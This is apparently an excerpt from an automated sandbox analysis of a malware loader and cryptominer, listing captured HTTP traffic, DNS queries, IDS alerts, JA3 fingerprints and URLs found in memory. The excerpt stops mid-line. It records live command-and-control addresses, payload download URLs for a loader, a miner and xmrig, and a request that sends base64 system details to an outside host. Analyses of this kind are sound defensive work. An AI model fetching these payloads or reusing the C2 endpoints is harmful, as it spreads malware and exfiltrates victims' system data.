Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_00C2BD60

Source: global traffic	HTTP traffic detected: GET /download/conf1.php HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /download/miner2.0.exe HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /inc/loader_5879465914.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: eijfrhegrtbrfcd.online
Source: global traffic	DNS traffic detected: DNS query: sanctam.net
Source: global traffic	DNS traffic detected: DNS query: github.com

Source: unknown

HTTP traffic detected: POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1Connection: Keep-AliveUser-Agent: A WinHTTP Example Program/1.0Content-Length: 0Host: eijfrhegrtbrfcd.online

Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/System32
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/4
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/7737D9ECF5C72AA370644
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&7:
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/dn
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:7.
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB7V
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpER
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpF6Z
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM6
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpN7
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpWindows
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedA
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exe
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded&
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded3
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded4
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedJ
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodede
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedr
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpr7f
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Local
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ViewSizePreferences.SourceAumid2
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/W
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Wiow
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe%
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exeh
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ones
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/t
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ysWOW64
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: svchost64.exe, 0000006B.00000002.2706597636.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 00000090.00000002.2783114203.0000000003221000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 0000009F.00000002.2836528294.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: sihost64.exe, 0000009F.00000002.2836528294.00000000032D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: loader_5879465914.exe, 00000007.00000003.2741556491.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2724634660.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2791232817.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2894492934.000000000378D000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2857988717.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2763069351.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2908398363.0000000003788000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2949314469.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2867639993.000000000378E000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3022068193.0000000003799000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2590705590.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2742582676.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2864099579.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2832045972.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2399904766.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2879187208.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2510316366.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/
Source: loader_5879465914.exe, 00000007.00000003.2550392048.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3020183902.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2438846550.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2467127699.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2426102539.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2793911920.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2635393911.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2373865784.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2481291707.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2620255870.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 